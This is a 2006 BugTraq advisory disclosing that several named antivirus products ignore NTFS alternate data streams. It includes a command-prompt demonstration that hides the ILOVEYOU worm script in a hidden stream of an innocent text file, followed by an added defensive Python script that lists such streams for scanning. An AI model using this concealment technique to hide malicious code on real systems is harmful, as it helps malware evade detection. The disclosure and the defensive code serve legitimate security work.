BugTraq
Multiple Vendor NTFS Data Stream Malware Stealth Technique Jun 04 2006 06:17PM
Joxean Koret (joxeankoret yahoo es)
Hi to all!

Because it isn't a new problem and is well known by virus and spyware
writers, I decided to release it to the public now. Full disclosure.

Attached is a simple paper that describes this "very-advanced"
technique, which was applicable in 1993 and is currently applicable.

Regards,
Joxean Koret

Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------

Contact
-------

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Multiple Vendor NTFS Data Stream Malware Stealth Technique
----------------------------------------------------------

Affected products/vendors:

Panda Software. All products.
ClamWin. All versions.
Norman Virus Control. All versions.
AVG Antivirus.

Non-affected vendors:

McAfee / Computer Associates
Avira AntiVir PersonalEdition Classic

Technique Description
---------------------

It isn't in any way a new technique: the first proof of concept of hiding malware in an NTFS
data stream was published in 2000. Apparently the technique wasn't very popular, and as a result
75% (or more) of the anti-virus industry has ignored it.

The technique is as simple as follows. Download a virus file, even an old one. Call it, for example,
'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------------------------------------

C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt
I'm an inocent file.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8475-DDEF

 Directory of C:

06/03/2006  01:10    <DIR>          Documents and Settings
03/06/2006  05:10                23 file.txt
03/06/2006  04:52            10.320 iloveyou.txt
03/06/2006  04:52            10.320 iloveyou.vbs
26/12/2005  00:51    <DIR>          Inetpub
03/06/2006  05:09    <DIR>          Program Files
29/05/2006  23:24                12 test1.vbs
03/06/2006  05:06    <DIR>          WINNT
               4 File(s)         20.675 bytes
               4 Dir(s)   2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt
I'm an inocent file.

C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder (at) mail (dot) com / @GRAMMERSoft Group /
(...)
---More---

------------------------------------------------------------------------------------------------------

Now try scanning your system with your preferred vulnerable antivirus product. The first file,
'iloveyou.vbs', stored in a normal data stream, will (surely) be detected, but not the copy of it
stored in an alternate data stream of the apparently innocent file c:\file.txt.
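A defender-side complement to the session above, added here and not part of the advisory: a scanner has to enumerate every named stream, not just the default one. Windows' `dir /R` (available from Vista on, so later than this advisory) lists each alternate data stream as '<size> <file>:<stream>:$DATA'; the script below parses that listing so each stream path can be opened and scanned, and treats the browser's Zone.Identifier marker as the one stream that is expected. The sample listing is constructed to mirror the session above.

```python
"""Enumerate NTFS alternate data streams from a `dir /R` listing.
Added example, not code from the advisory; `dir /R` prints each named
stream as '<size> <file>:<stream>:$DATA' on its own indented line."""
import re
import subprocess
from typing import NamedTuple

# Indented line: size with locale separators, then file:stream:$DATA.
_STREAM_RE = re.compile(r"^\s+([\d.,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")
# Mark-of-the-Web stream written by browsers; present on most downloads.
BENIGN_STREAMS = {"Zone.Identifier"}

class AltStream(NamedTuple):
    file: str
    stream: str
    size: int

    @property
    def path(self) -> str:
        # On Windows, open() accepts 'file:stream' and reads that stream.
        return f"{self.file}:{self.stream}"

def parse_dir_r(listing: str) -> list[AltStream]:
    """Return every alternate data stream named in `dir /R` output."""
    streams = []
    for line in listing.splitlines():
        m = _STREAM_RE.match(line)
        if m:
            size = int(re.sub(r"[.,]", "", m.group(1)))
            streams.append(AltStream(m.group(2), m.group(3), size))
    return streams

def suspicious_streams(streams: list[AltStream]) -> list[AltStream]:
    """Everything except the known-benign marker stream needs a scan."""
    return [s for s in streams if s.stream not in BENIGN_STREAMS]

def list_streams(directory: str) -> list[AltStream]:
    """Run `dir /R` on a Windows host and parse its output."""
    proc = subprocess.run(["cmd", "/c", "dir", "/R", directory],
                          capture_output=True, text=True, check=True)
    return parse_dir_r(proc.stdout)

# Constructed listing mirroring the advisory's session after the redirect.
SAMPLE_LISTING = """\
03/06/2006  05:10                23 file.txt
                             10.320 file.txt:virus.vbs:$DATA
03/06/2006  04:52            10.320 iloveyou.vbs
                                 26 iloveyou.vbs:Zone.Identifier:$DATA
"""
```

On the sample listing, `suspicious_streams(parse_dir_r(SAMPLE_LISTING))` yields only `file.txt:virus.vbs`, the path a scanner would open next; `list_streams(r"C:\")` does the same against a live Windows directory.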

